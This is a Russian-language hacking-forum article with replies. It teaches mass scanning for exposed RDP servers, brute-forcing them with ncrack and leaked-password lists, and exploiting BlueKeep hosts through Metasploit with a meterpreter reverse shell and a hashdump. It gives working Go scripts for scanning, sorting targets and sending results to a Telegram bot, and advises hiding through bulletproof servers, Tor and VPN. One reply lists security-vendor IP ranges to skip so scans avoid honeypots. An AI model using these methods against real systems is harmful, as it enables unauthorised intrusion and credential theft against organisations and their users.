• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Брутфорс и взлом RDP в 2025 году

miserylord

RAID-массив
Пользователь
Регистрация
13.05.2024
Сообщения
97
Реакции
319
Автор: miserylord
Эксклюзивно для форума:
xss.pro

Никакого проприетарного софта! Всё объяснено так просто, что даже абсолютный новичок поймёт с первого раза!

f58e58b2-3fc7-4d31-bb13-ecc235ded601.jpg


RDP (Remote Desktop Protocol, протокол удалённого рабочего стола) — это протокол, разработанный компанией Microsoft. Он позволяет пользователю подключаться к удалённому компьютеру через сеть и управлять им так, как если бы он находился за ним физически.

По-простому, это как компьютер с запущенной Windows, но на удалённой машине.

Брутфорс-атака, в свою очередь, представляет собой метод перебора комбинаций логина и пароля. Она эксплуатирует распространённость одинаковых или слабых паролей, используемых разными людьми.

По-простому, это когда людям сложно придумать сложные пароли, и они, как bad actors, этим пользуемся.

В сети подключённые устройства имеют порядковые номера, которые называются IP-адресами. У каждого адреса есть немного больше 65 тысяч портов. Проще представить это с помощью аналогии: если мир — это огромная планета торговых центров, то IP-адреса — это адреса ТЦ, а порты — конкретные магазины внутри них. Для RDP стандартным является порт 3389.

Как на этой планете, так и в сети есть территории и их суверены. Каждый может выбрать своих по домену верхнего уровня TLD-Country-Bounds.

Определившись с выбором, приводим TLD к IP-адресам, используя данные из репозитория: RIR-IP по странам.

Просканировать порты — шаг номер два.

Masscan моментально обнаруживает открытые порты, но есть свои нюансы. Порты могут находиться в двух состояниях: быть открытыми или закрытыми. Однако они также могут быть открытыми, но при этом не иметь запущенной службы RDP.

Masscan действительно быстро обнаруживает открытые порты, но подавляющая часть из них либо не имеет службы RDP, либо закрыта фаерволом. Одним словом, такие хосты совершенно не пригодны для использования в задаче, что становится ясно только после проверки nmap. А nmap, в свою очередь, требует времени.

Таким образом, связка masscan + nmap (или другой определитель служб) может быть использована, но я нашел вариант гораздо интереснее.

GitHub, луна моей жизни, предлагает решение, которое я использую: GitHub - robertdavidgraham/rdpscan: A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability.

adcda8f8f6bce795028da2a064728593.jpg


Это на самом деле сканер для конкретной уязвимости CVE-2019-0708, известной как BlueKeep. Внезапно, несмотря на её возраст, хосты с этой уязвимостью всё ещё встречаются в результатах. О том, как обрабатывать такие хосты, я расскажу позже.

Важно здесь то, что с помощью этого кода можно определить адреса с запущенной службой RDP.

Ознакомимся с документацией программы из репозитория. Она принимает диапазон IP-адресов и для каждого адреса выдаёт лог, который может быть в одном из нескольких состояний:

  • UNKNOWN — с такими адресами не работаем.
  • VULNERABLE — хосты с уязвимостью CVE-2019-0708. Их сохраняем, о них поговорим позже.
  • SAFE — хост не уязвим для BlueKeep, но может быть подходящим для дальнейшей брутфорс-атаки, если состояние указано как SAFE или SAFE - CredSSP/NLA.
  • SAFE - not RDP — по очевидным причинам не подходит для брутфорс-атаки.

Документация утверждает, что программа может работать в связке с masscan для ускорения проверки, хотя и сама по себе работает очень быстро. Более того, если немного взглянуть на код, становится понятно, что она использует некоторые фрагменты кода из masscan.

Клонируем репозиторий. Для сборки исполняемого файла в папке с программой необходимо ввести команду make. Возможно, потребуется установить дополнительные пакеты. Если возникнут ошибки, просто скопируйте их и отправьте в ChatGPT для исправления.

Порой процесс работы программы нужно довести до ума. Например, если программа не работает с текстовыми файлами, можно самостоятельно написать небольшой скрипт на любом языке программирования — Python, Bash, Go.

Программа работает с диапазонами IP-адресов. На этапе их сбора у нас образовался текстовый файл. Немного автоматизации: программа построчно берёт данные из файла, а скрипт также сохраняет результаты работы программы в другой файл. Подобного поведения можно добиться, просто перенаправив поток вывода с помощью >> res.txt на Linux-машинах в терминале.

C-подобный:
package main

import (
    "bufio"
    "fmt"
    "os"
    "os/exec"
    "strings"
)

func main() {
    file, err := os.Open("ip.txt")
    if err != nil {
        fmt.Println("Ошибка при открытии файла:", err)
        return
    }
    defer file.Close()

    outputFile, err := os.OpenFile("output.txt", os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
    if err != nil {
        fmt.Println("Ошибка при открытии файла output.txt:", err)
        return
    }
    defer outputFile.Close()

    scanner := bufio.NewScanner(file)

    for scanner.Scan() {
        ip := scanner.Text()
        if strings.TrimSpace(ip) == "" {
            continue
        }

        cmd := exec.Command("./rdpscan", "--workers", "350", ip)

        cmd.Stdout = outputFile
        cmd.Stderr = os.Stderr

        err := cmd.Run()
        if err != nil {
            fmt.Println("Ошибка при выполнении команды:", err)
        } else {
            fmt.Printf("Команда для IP %s выполнена успешно\n", ip)
        }
    }

    if err := scanner.Err(); err != nil {
        fmt.Println("Ошибка при чтении файла:", err)
    }
}

Обратите внимание на строку cmd := exec.Command("./rdpscan", "--workers", "350", ip). Увеличивая число (третий аргумент), вы повышаете скорость работы программы. Этот параметр отвечает за количество одновременно запущенных горутин. Значение 350 — это небольшое число, но с ним программа работает достаточно быстро для простого сканера портов, ведь сама брутфорс-атака займет больше времени.

На этом этапе желательно запустить всё на удалённой машине. Проблема анонимности в том, что она не абстрактна: всё в сети — это буквально физические устройства. Следовательно, возможна ли анонимность? Или Столяров не так уж безумен, а просто принял это слишком близко к сердцу?

Где найти абьюзоустойчивые сервера — как говорят у нас, или буллетпруф — как у них? Берёшь любой Ubuntu Server, поднимаешь на нём VNC (это как RDP для Windows) и открываешь доступ со всех IP, вход по логину и паролю, не забывая вести логи. Смотришь логи дважды в день.IP проверяешь на https://whatismyipaddress.com/. Тебя интересует не каждый адрес, а тот, который будет пытаться подбират логин и пароль, то есть фактически пытается взломать. Проверяешь его на https://whatismyipaddress.com/ и гуглишь ISP — поздравляю, ты нашёл буллетпруф!

Но что, если не уверен в сервере? Бэкап.

Этот код решает следующую задачу — сохранение результатов и их бэкап с помощью Telegram-бота. Скомпилированный файл rdpscan должен находиться в той же папке, что и скрипт main.go.

C-подобный:
package main

import (
    "archive/zip"
    "bufio"
    "fmt"
    "io"
    "os"
    "os/exec"
    "path/filepath"
    "strings"
    "sync"
    "time"

    "bytes"
    "mime/multipart"
    "net/http"
)

var outputMutex sync.Mutex
var checkedMutex sync.Mutex

func archiveFiles(outputPath string, files []string) error {
    archive, err := os.Create(outputPath)
    if err != nil {
        return fmt.Errorf("ошибка при создании архива: %v", err)
    }
    defer archive.Close()

    zipWriter := zip.NewWriter(archive)
    defer zipWriter.Close()

    for _, file := range files {
        fileToZip, err := os.Open(file)
        if err != nil {
            return fmt.Errorf("ошибка при открытии файла %s: %v", file, err)
        }
        defer fileToZip.Close()

        info, err := fileToZip.Stat()
        if err != nil {
            return fmt.Errorf("ошибка при получении информации о файле %s: %v", file, err)
        }

        header, err := zip.FileInfoHeader(info)
        if err != nil {
            return fmt.Errorf("ошибка при создании заголовка файла %s: %v", file, err)
        }
        header.Name = filepath.Base(file)
        header.Method = zip.Deflate

        writer, err := zipWriter.CreateHeader(header)
        if err != nil {
            return fmt.Errorf("ошибка при создании записи в архиве: %v", err)
        }
        _, err = io.Copy(writer, fileToZip)
        if err != nil {
            return fmt.Errorf("ошибка при копировании файла %s в архив: %v", file, err)
        }
    }

    return nil
}

func sendToTelegram() error {
    telegramToken := "" // Тут токен
    chatID := int64()    // Тут чат айди в скобку
    filePath := "archive.zip"

    file, err := os.Open(filePath)
    if err != nil {
        return fmt.Errorf("ошибка при открытии файла %s: %v", filePath, err)
    }
    defer file.Close()

    var buf bytes.Buffer
    writer := multipart.NewWriter(&buf)

    part, err := writer.CreateFormFile("document", filePath)
    if err != nil {
        return fmt.Errorf("ошибка при создании multipart формы: %v", err)
    }

    _, err = io.Copy(part, file)
    if err != nil {
        return fmt.Errorf("ошибка при копировании файла в форму: %v", err)
    }

    writer.WriteField("chat_id", fmt.Sprintf("%d", chatID))

    err = writer.Close()
    if err != nil {
        return fmt.Errorf("ошибка при закрытии writer: %v", err)
    }

    url := fmt.Sprintf("https://api.telegram.org/bot%s/sendDocument", telegramToken)
    req, err := http.NewRequest("POST", url, &buf)
    if err != nil {
        return fmt.Errorf("ошибка при создании HTTP-запроса: %v", err)
    }
    req.Header.Set("Content-Type", writer.FormDataContentType())

    client := &http.Client{
        Timeout: 30 * time.Second,
    }
    resp, err := client.Do(req)
    if err != nil {
        return fmt.Errorf("ошибка при отправке запроса: %v", err)
    }
    defer resp.Body.Close()

    if resp.StatusCode != http.StatusOK {
        return fmt.Errorf("не удалось отправить документ, статус: %s", resp.Status)
    }

    fmt.Println("Архив успешно отправлен в Telegram")
    return nil
}


func periodicTask(intervalMinutes int, files []string, archivePath string) {
    for {
        err := archiveFiles(archivePath, files)
        if err != nil {
            fmt.Printf("Ошибка при создании архива: %v\n", err)
        } else {
            fmt.Println("Архив успешно создан")
            err = sendToTelegram()
            if err != nil {
                fmt.Printf("Ошибка при отправке архива: %v\n", err)
            } else {
                fmt.Println("Архив успешно отправлен")
            }
        }
        time.Sleep(time.Duration(intervalMinutes) * time.Minute)
    }
}

func processIPs() {
    file, err := os.Open("ip.txt")
    if err != nil {
        fmt.Println("Ошибка при открытии файла:", err)
        return
    }
    defer file.Close()

    outputFile, err := os.OpenFile("output.txt", os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
    if err != nil {
        fmt.Println("Ошибка при открытии файла output.txt:", err)
        return
    }
    defer outputFile.Close()

    checkedFile, err := os.OpenFile("checked.txt", os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
    if err != nil {
        fmt.Println("Ошибка при открытии файла checked.txt:", err)
        return
    }
    defer checkedFile.Close()

    scanner := bufio.NewScanner(file)

    for scanner.Scan() {
        ip := scanner.Text()
        if strings.TrimSpace(ip) == "" {
            continue
        }

        cmd := exec.Command("./rdpscan", "--workers", "350", ip)

        outputMutex.Lock()
        cmd.Stdout = outputFile
        cmd.Stderr = os.Stderr
        err := cmd.Run()
        outputMutex.Unlock()

        if err != nil {
            fmt.Println("Ошибка при выполнении команды:", err)
        } else {
            fmt.Printf("Команда для IP %s выполнена успешно\n", ip)

            checkedMutex.Lock()
            _, err := checkedFile.WriteString(ip + "\n")
            checkedMutex.Unlock()

            if err != nil {
                fmt.Println("Ошибка при записи IP в checked.txt:", err)
            }
        }
    }

    if err := scanner.Err(); err != nil {
        fmt.Println("Ошибка при чтении файла:", err)
    }
}

func main() {
    archivePath := "archive.zip"
    files := []string{"output.txt", "checked.txt"}
    intervalMinutes := 60

    go periodicTask(intervalMinutes, files, archivePath)
    processIPs()
}

Для этого необходимо создать Telegram-бота, а также узнать ID чата. Инструкцию можно найти, например, здесь: Create a Telegram Bot and Obtain the Chat ID - Step-by-Step Guide - YouTube.

В определенные моменты времени (с заданным интервалом) код создает (или перезаписывает) архив, в котором содержатся текстовый лог программы, а также адреса, которые уже были проверены. После этого архив отправляется сообщением в бота. Код синхронизирует доступ к критическим секциям с помощью мьютексов.

Параметры, которые необходимо настроить:

  • telegramToken — токен вашего бота.
  • chatID — ID чата для отправки сообщений.
  • intervalMinutes — интервал времени, установленный по умолчанию на 60 минут (его можно изменить).

Бота нужно запустить как отдельный скрипт, чтобы он мог принимать сообщения. В скрипте бота также необходимо указать telegramToken.

C-подобный:
package main

import (
    "bytes"
    "encoding/json"
    "fmt"
    "io/ioutil"
    "net/http"
    "time"
)

const (
    telegramToken = ""
)

type Update struct {
    UpdateID int `json:"update_id"`
    Message  struct {
        Text string `json:"text"`
        Chat struct {
            ID int64 `json:"id"`
        } `json:"chat"`
    } `json:"message"`
}

func handleMessage(chatID int64, text string) {
    fmt.Printf("Получено сообщение от %d: %s\n", chatID, text)
    sendMessage(chatID, "Ваше сообщение получено: "+text)
}

func sendMessage(chatID int64, text string) {
    url := fmt.Sprintf("https://api.telegram.org/bot%s/sendMessage", telegramToken)
    payload := map[string]interface{}{
        "chat_id": chatID,
        "text":    text,
    }

    body, err := json.Marshal(payload)
    if err != nil {
        fmt.Println("Ошибка при сериализации payload:", err)
        return
    }

    client := &http.Client{
        Timeout: 30 * time.Second,
    }

    resp, err := client.Post(url, "application/json", bytes.NewBuffer(body))
    if err != nil {
        fmt.Println("Ошибка при отправке сообщения:", err)
        return
    }
    defer resp.Body.Close()

    if resp.StatusCode != http.StatusOK {
        fmt.Println("Ошибка при отправке сообщения, статус:", resp.Status)
    } else {
        fmt.Println("Сообщение успешно отправлено")
    }
}

func main() {
    lastUpdateID := 0

    client := &http.Client{
        Timeout: 30 * time.Second,
    }

    for {
        url := fmt.Sprintf("https://api.telegram.org/bot%s/getUpdates?offset=%d", telegramToken, lastUpdateID+1)
        resp, err := client.Get(url)
        if err != nil {
            fmt.Println("Ошибка при получении обновлений:", err)
            continue
        }
        defer resp.Body.Close()

        if resp.StatusCode != http.StatusOK {
            fmt.Printf("Ошибка при получении обновлений: статус %s\n", resp.Status)
            continue
        }

        body, err := ioutil.ReadAll(resp.Body)
        if err != nil {
            fmt.Println("Ошибка при чтении ответа:", err)
            continue
        }

        var updates struct {
            Result []Update `json:"result"`
        }
        err = json.Unmarshal(body, &updates)
        if err != nil {
            fmt.Println("Ошибка при парсинге ответа:", err)
            continue
        }

        for _, update := range updates.Result {
            handleMessage(update.Message.Chat.ID, update.Message.Text)
            lastUpdateID = update.UpdateID
        }
    }
}

Полученный файл лога можно обработать с помощью скрипта, который разделяет хосты на две категории:

  • хосты с уязвимостью
  • хосты для брутфорса

На выходе вы получите их списки в виде IP-адресов.

Скрипт запускается в папке, где находится файл output.txt. В результате выполнения скрипта создаются два файла:

  • forBruteIp.txt — список хостов для брутфорса,
  • BlueKeep.txt — список хостов с уязвимостью BlueKeep.

C-подобный:
package main

import (
    "bufio"
    "fmt"
    "os"
    "regexp"
    "strings"
)

func main() {
    inputFileName := "output.txt"
    safeOutputFileName := "forBruteIp.txt"
    vulnerableOutputFileName := "BlueKeep.txt"

    inputFile, err := os.Open(inputFileName)
    if err != nil {
        fmt.Printf("Ошибка при открытии файла %s: %v\n", inputFileName, err)
        return
    }
    defer inputFile.Close()

    safeFile, err := os.OpenFile(safeOutputFileName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
    if err != nil {
        fmt.Printf("Ошибка при открытии файла %s: %v\n", safeOutputFileName, err)
        return
    }
    defer safeFile.Close()

    vulnerableFile, err := os.OpenFile(vulnerableOutputFileName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
    if err != nil {
        fmt.Printf("Ошибка при открытии файла %s: %v\n", vulnerableOutputFileName, err)
        return
    }
    defer vulnerableFile.Close()

    safeWriter := bufio.NewWriter(safeFile)
    defer safeWriter.Flush()

    vulnerableWriter := bufio.NewWriter(vulnerableFile)
    defer vulnerableWriter.Flush()

    scanner := bufio.NewScanner(inputFile)

    ipRegex := regexp.MustCompile(`\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b`)

    for scanner.Scan() {
        line := scanner.Text()
        ip := ipRegex.FindString(line)
        if ip == "" {
            continue
        }

        if containsSafeKeywords(line) {
            _, err := safeWriter.WriteString(ip + "\n")
            if err != nil {
                fmt.Printf("Ошибка при записи строки в файл SAFE: %v\n", err)
                return
            }
        } else if containsVulnerableKeywords(line) {
            _, err := vulnerableWriter.WriteString(ip + "\n")
            if err != nil {
                fmt.Printf("Ошибка при записи строки в файл VULNERABLE: %v\n", err)
                return
            }
        }
    }

    if err := scanner.Err(); err != nil {
        fmt.Printf("Ошибка при чтении файла %s: %v\n", inputFileName, err)
    }
}

func containsSafeKeywords(line string) bool {
    return strings.Contains(line, "SAFE - CredSSP") || strings.Contains(line, "SAFE - Target")
}

func containsVulnerableKeywords(line string) bool {
    return strings.Contains(line, "VULNERABLE")
}

Если говорить из практики — взяв 20 IP-диапазонов, удалось найти чуть больше тысячи ста хостов под брут, и один хост с BlueKeep. Проверка заняла несколько часов.

По поводу сокрытия работы на VPS. Можно использовать TOR и VPN. Например, скрипт проверки прекрасно работает с запущенным поверх torify, который обеспечивает Tor-трафик. В целом трафик можно пустить через VPN, но это уже теоретическая информация. Просто активность типа брутфорса может триггерить провайдера, а большой трафик на VPN может быть не так подозрителен. Конечно, брутфорс — это в целом большой объем трафика, но глобально VPN это не очень подозрительно, многие продуктовые IT-компании используют VPN для сотрудников в целях безопасности. Tor-трафик, пожалуй, более подозрителен, но вы же помните, что все серверы — это физические компьютеры?

Не забудьте использовать команду nohup, иначе запущенные скрипты прекратят свою работу, как только завершится SSH-сессия.

Что ж, сперва разберемся с хостами под CVE-2019-0708. Во-первых, это старая уязвимость, и возможно, хосты могут выступать ханипотами. Но все же, в нескольких словах, это хитрая уязвимость типа переполнения буфера, и о ней написано довольно много материалов. Я же хочу ответить на вопрос, как именно ее эксплуатировать.

Проверив количество хостов в Shodan, можно использовать дорку vuln:cve-2019-0708. Просканировав всю сеть, будет обнаружено больше хостов, чем покажет Shodan!

Воспользуемся Metasploit. Устанавливаем и запускаем его командой msfconsole. Выбираем эксплоит командой use exploit/windows/rdp/cve_2019_0708_bluekeep_rce, устанавливаем RHOST в виде IP-адреса, на котором сканер задетектировал уязвимость: set RHOSTS 127.0.0.1. В качестве пейлоада вводим команду set PAYLOAD windows/x64/meterpreter/reverse_tcp. Устанавливаем LHOST на IP-адрес машины, с которой происходит эксплотация: set LHOST. Далее вводим команду exploit. Если все прошло успешно (хотя это не всегда так), то получаем meterpreter-сессию. Затем извлекаем хеши командой hashdump. После этого снимаем их с помощью Hashcat или John the Ripper и получаем креды для подключения. Вот хорошая демонстрация: BlueKeep RDP Vulnerability CVE-2019-0708 Exploit in Metasploit - Video 2021 with InfoSec Pat.

Следующий шаг — сбор баз паролей и логинов. Я бы не рекомендовал использовать базы, где, например, отсутствуют специальные символы и заглавные буквы, такие как эта: https://github.com/jeanphorn/wordlist/blob/master/rdp_passlist.txt. На мой взгляд, неплохой репозиторий — https://github.com/danielmiessler/SecLists/tree/master/Passwords. Здесь также можно найти хорошие логины: https://github.com/danielmiessler/SecLists/tree/master/Usernames. Кроме того, базу можно собрать из ранее утекших паролей других тематических сайтов, доступов или логов.

Скачав несколько файлов, объединяем их с помощью скрипта, оставляя только уникальные строки длиной не менее 4 символов, дополнительно рандомизируя их.

C-подобный:
    package main
   
    import (
        "bufio"
        "math/rand"
        "os"
        "path/filepath"
        "strings"
        "time"
    )
   
    func main() {
        rand.Seed(time.Now().UnixNano())
   
        uniqueLines := make(map[string]struct{})
   
        files, err := filepath.Glob("*.txt")
        if err != nil {
            panic(err)
        }
   
        for _, file := range files {
            f, err := os.Open(file)
            if err != nil {
                panic(err)
            }
            defer f.Close()
   
            scanner := bufio.NewScanner(f)
            for scanner.Scan() {
                line := strings.TrimSpace(scanner.Text())
                if len(line) > 4 {
                    uniqueLines[line] = struct{}{}
                }
            }
            if err := scanner.Err(); err != nil {
                panic(err)
            }
        }
   
        lines := make([]string, 0, len(uniqueLines))
        for line := range uniqueLines {
            lines = append(lines, line)
        }
   
        rand.Shuffle(len(lines), func(i, j int) { lines[i], lines[j] = lines[j], lines[i] })
   
        outputFile, err := os.Create("result.txt")
        if err != nil {
            panic(err)
        }
        defer outputFile.Close()
   
        writer := bufio.NewWriter(outputFile)
        for _, line := range lines {
            writer.WriteString(line + "\n")
        }
   
        if err := writer.Flush(); err != nil {
            panic(err)
        }
   
        println("Обработка завершена. Результат записан в файл result.txt")
    }

Финальный шаг — запускаем брутфорс. Предлагаю воспользоваться утилитой ncrack. Я лично не проводил сравнения, но читал статью, в которой ncrack превосходил Hydra и Medusa по скорости брутфорса RDP.

Команда: ncrack -v -f -CL -U usernames.txt -P passwords.txt -iL targets.txt -p 3389 -oN results.txt

Флаг -f остановит проверку на этапе первого найденного удачного результата. Результаты будут записаны в текстовый файл. Через пару суток можно проверить. Также рекомендуется поэкспериментировать с параметрами `-T`.

Трям! Пока!
e6c0848a6932d08a81fc0221eba800a8.jpg
 
Спасибо за информацию, и, насколько я знаю, вы правы насчёт Ncrack. По сравнению с другими инструментами для перебора, Ncrack поддерживает меньше протоколов, но является более эффективным и производительным.
 
А вот это интересно, надо затестить. Есть ли проблемы с блоком брута и возможность смены proxy? Или без этого норм?
Да, там есть какая-то такая проблема, я точно не понял в чем она заключается, но тайминги атаки увеличиваются в большую сторону, что-то идет не так, так в любом случаи быть не должно, нет там вроде нет прокси, есть другие параметры, но в любом случае какое-то не нормально поведение. Вот возращаясь к бруту внс, по определению исп абьюз, то их брутеры не отстреливали момент с конфигурацией дефолтной внс которая полсе какого-то количества попыток просто блокировала любые подключение, там по сути проблема была не в прокси а в том что софт которым брутили не отстреливал этот момент и просто грузил канал до момента пока на ссш айпишник не залочить, но даже после этого с другого нужно ждать время, иначе никто не мог подключится бесконечно долго, что-то такое могу предположить и здесь
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Как по мне, то это худший способ брута RDP в 2025 году. А по поводу bluekeep, то да, еще можно достать доступы с этой уязвимости
Лично мне попадался один шлак)
Месяц назад
 
Лично мне попадался один шлак)
Месяц назад
Более интересно, кому это гавно старое нужно вообще?
Я написал, что попадаются доступы с ЭТОЙ уязвимостью, но никак не с этим эксплоитом от метасплоита. У кого есть приват bluekeep поймет
 
Я написал, что попадаются доступы с ЭТОЙ уязвимостью, но никак не с этим эксплоитом от метасплоита. У кого есть приват bluekeep поймет
и как там таргеты?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Лично мне попадался один шлак)
Месяц назад
если осталось слей в личку)) для одного шлак - для другого может пригодиться =)

upd. статья кстати интересная, почему на конкурс не отправишь? попроси админа перенести, я бы проголосовал за эту статью
 
а какой тогда лучший?
Скинул пару видео мануалов на русском в лс . может найдешь для себя что то новое
 
Hey buddy i would like those videos aswell if is possible, i dont speak russian but i can understand the ways you might use, just to have a new idea, about the OP, good theme i barely brute RDP but is always a good option, people keep using the same passwords year after year!
Source: https://mashable.com/article/worst-passwords-2024-nordpass
 
Пожалуйста, обратите внимание, что пользователь заблокирован
CVE-2019-0708. Во-первых, это старая уязвимость, и возможно, хосты могут выступать ханипотами.
100%, поэтому не забываем юзать текстовый файл при сканировании, исключающий определённые диапазоны, а именно:
# NETCRAFT IP RANGES

194.52.68.0-194.52.68.255
194.72.238.0-194.72.238.255
83.138.182.72-83.138.182.79
83.138.189.96-83.138.189.103
81.91.240.0-81.91.255.255
89.36.24.0-89.36.31.255
83.222.232.216-83.222.232.218
184.172.0.0-184.173.255.255

# KASPERSKY IP RANGES

195.170.248.0-195.170.248.255
212.5.107.128-212.5.107.255
212.5.80.0-212.5.80.63
212.5.110.0-212.5.110.255
80.239.144.72-80.239.144.79
80.23.53.208-80.23.53.215
81.176.69.64-81.176.69.127
80.239.156.192-80.239.156.207
213.247.248.80-213.247.248.83
213.247.248.112-213.247.248.119
212.58.46.56-212.58.46.63
91.103.64.0-91.103.71.255
91.103.64.0-91.103.67.255
212.178.99.152-212.178.99.159
212.47.219.80-212.47.219.95
195.161.114.0-195.161.114.255
91.103.68.0-91.103.71.255
77.74.176.0-77.74.183.255
77.74.176.0-77.74.179.255
77.74.180.0-77.74.183.255
195.222.17.32-195.222.17.63
195.27.181.0-195.27.181.255
88.58.91.48-88.58.91.55
93.159.224.0-93.159.231.255
213.0.56.232-213.0.56.239
213.0.107.144-213.0.107.151
80.239.197.96-80.239.197.127
94.228.184.16-94.228.184.23
93.104.193.160-93.104.193.191
62.213.110.0-62.213.110.63
92.33.3.64-92.33.3.95
92.33.3.96-92.33.3.127
82.98.75.128-82.98.75.191
212.5.89.0-212.5.89.255
87.118.220.168-87.118.220.171
62.213.110.128-62.213.110.191
94.228.185.80-94.228.185.95
85.18.238.56-85.18.238.59
82.98.110.160-82.98.110.191
93.104.242.128-93.104.242.159
93.104.242.160-93.104.242.191
80.239.174.32-80.239.174.63
82.98.105.32-82.98.105.63
212.19.32.64-212.19.32.159
87.213.24.40-87.213.24.43
87.213.45.168-87.213.45.175
93.104.230.192-93.104.230.255
88.217.237.0-88.217.237.255
80.239.170.128-80.239.170.191
195.27.252.0-195.27.252.127
80.239.169.128-80.239.169.159
213.155.151.32-213.155.151.63
212.65.69.56-212.65.69.63
212.65.93.24-212.65.93.31
212.65.82.48-212.65.82.55
46.229.18.64-46.229.18.95
212.170.112.192-212.170.112.199
2.228.23.32-2.228.23.39
82.98.75.40-82.98.75.47
82.98.74.8-82.98.74.15
193.45.6.0-193.45.6.31
93.159.224.0-93.159.227.255
93.159.228.0-93.159.228.0
93.159.230.0-93.159.231.255
2.228.172.192-2.228.172.199
81.19.104.0-81.19.104.255

# OPENDNS IP RANGES

65.199.111.184-65.199.111.191
63.80.66.32-63.80.66.63
65.203.37.40-65.203.37.47
65.222.158.80-65.222.158.87
208.67.216.0-208.67.223.255
208.69.32.0-208.69.39.255
67.215.64.0-67.215.95.255
63.118.61.32-63.118.61.63
65.204.147.0-65.204.147.7
212.13.198.240-212.13.198.255

# INTERNET SYSTEMS CONSORTIUM IP RANGES ( PHISHTANK )

149.20.0.0-149.20.255.255
192.5.4.0-192.5.5.255
204.152.184.0-204.152.191.255

# BITDEFENDER IP RANGES

91.199.104.0-91.199.104.255
62.153.200.240-62.153.200.247
195.210.4.0-195.210.5.255
37.59.67.144-37.59.67.159
37.58.119.200-37.58.119.207
81.161.59.0-81.161.59.255
5.10.82.120-5.10.82.123
159.253.146.200-159.253.146.207

# SURFRIGHT IP RANGES

87.249.110.176-87.249.110.191

# FORTINET TECHNOLOGIES IP RANGES

204.101.161.0-204.101.161.255
173.212.140.0-173.212.140.255
69.90.198.48-69.90.198.63
69.20.231.224-69.20.231.239
204.50.6.64-204.50.6.95
62.209.40.64-62.209.40.79
217.169.59.64-217.169.59.71
80.85.69.32-80.85.69.63
212.25.23.184-212.25.23.191
208.91.112.0-208.91.115.255
96.45.32.0-96.45.47.255
173.243.128.0-173.243.143.255

# GOOGLE APPS IP RANGES

199.192.112.0-199.192.115.255
206.160.135.240-206.160.135.255
208.21.209.0-208.21.209.15
108.59.80.0-108.59.95.255
173.255.112.0-173.255.127.255
8.35.192.0-8.35.199.255
8.35.200.0-8.35.207.255
8.34.216.0-8.34.223.255
8.34.208.0-8.34.215.255
199.223.232.0-199.223.239.255
192.158.28.0-192.158.31.255
66.249.83.84
64.233.172.84
66.249.84.4
66.249.88.89
66.102.7.4
66.249.82.4
66.249.85.89
173.255.112.208
66.249.83.204
66.249.88.216
64.233.160.0-64.233.191.255
66.102.0.0-66.102.15.255
66.249.64.0-66.249.95.255
72.14.192.0-72.14.255.255
74.125.0.0-74.125.255.255
209.85.128.0-209.85.255.255
216.239.32.0-216.239.63.255

# TOR SERVERS IP RANGES

96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
96.44.189.96-96.44.189.103

# AMAZON IP RANGES

54.219.0.0-54.219.255.255
54.193.0.0-54.193.255.255
204.236.128.0-204.236.255.255
54.242.0.0-54.243.255.255
107.20.0.0-107.23.255.255
216.182.224.0-216.182.239.255
50.16.0.0-50.19.255.255
72.44.32.0-72.44.63.255
184.72.0.0-184.73.255.255
67.202.0.0-67.202.63.255
75.101.128.0-75.101.255.255
174.129.0.0-174.129.255.255
23.20.0.0-23.23.255.255
54.248.0.0-54.249.255.255
54.253.0.0-54.253.255.255
54.247.0.0-54.247.255.255
54.233.0.0-54.233.255.255
54.226.0.0-54.227.255.255
54.230.0.0-54.231.255.255
54.234.0.0-54.235.255.255
54.232.0.0-54.232.255.255
54.236.0.0-54.237.255.255
54.252.0.0-54.252.255.255
54.251.0.0-54.251.255.255
54.238.0.0-54.238.255.255
54.228.0.0-54.229.255.255
54.208.0.0-54.209.255.255
54.210.0.0-54.211.255.255
54.216.0.0-54.217.255.255
54.220.0.0-54.220.255.255
54.221.0.0-54.221.255.255
54.250.0.0-54.250.255.255
175.41.160.0-175.41.191.255
176.34.8.0-176.34.15.255
54.255.0.0-54.255.255.255
54.254.0.0-54.254.255.255
176.32.80.0-176.32.87.255
46.137.232.0-46.137.239.255
54.240.0.0-54.255.255.255
54.176.0.0-54.191.255.255
54.196.0.0-54.197.255.255
54.72.0.0-54.95.255.255
54.198.0.0-54.198.255.255
72.21.192.0-72.21.223.255

# OVH IP RANGES

188.165.192.0-188.165.255.255
5.135.5.112-5.135.5.127
37.59.0.0-37.59.63.255
178.32.172.96-178.32.172.127
178.33.169.32-178.33.169.47

# RACKSPACE IP RANGES

95.138.176.0-95.138.191.255

# JAPAN NETWORK INFORMATION CENTER IP RANGES

133.0.0.0-133.255.255.255
219.96.0.0-219.127.255.255
133.11.0.0-133.12.255.255

# HOSTING SOLUTIONS UKRAINE IP RANGES

91.213.8.0-91.213.8.255

# NEW DREAM NETWORK IP RANGES

64.90.32.0-64.90.63.255
66.33.192.0-66.33.223.255
173.236.128.0-173.236.255.255
205.196.208.0-205.196.223.255
64.111.96.0-64.111.127.255
208.97.128.0-208.97.191.255
208.113.128.0-208.113.255.255
67.205.0.0-67.205.63.255
75.119.192.0-75.119.223.255
69.163.128.0-69.163.255.255

# RCS & RDS RESIDENTIAL IP RANGES

5.14.148.0-5.14.148.255
5.13.164.0-5.13.164.255

# TORNET IP RANGES

171.25.193.0-171.25.193.255

# ROMTELECOM IP RANGES

109.103.215.0-109.103.215.255
89.122.0.0-89.122.255.255

# NETPILOT ( CLEAN-MX.DE ) IP RANGES

195.214.79.0-195.214.79.255
195.214.5.0-195.214.5.255
62.67.240.0-62.67.241.255
81.171.250.104-81.171.250.111
89.206.141.13-89.206.141.13

# DATAPIPE IP RANGES

65.17.248.0-65.17.255.255

# PEER 1 NETWORK IP RANGES

65.39.128.0-65.39.255.255

# ANEXIA IP RANGES

37.252.238.0-37.252.238.255

# LEXSI IP RANGES

84.14.214.192-84.14.214.223
92.103.28.224-92.103.28.255

# FASTWEB ITALY IP RANGES

2.229.28.0-2.229.28.255

# GOOGLE CHROME IP RANGES

66.249.64.0-66.249.95.255
74.125.0.0-74.125.255.255
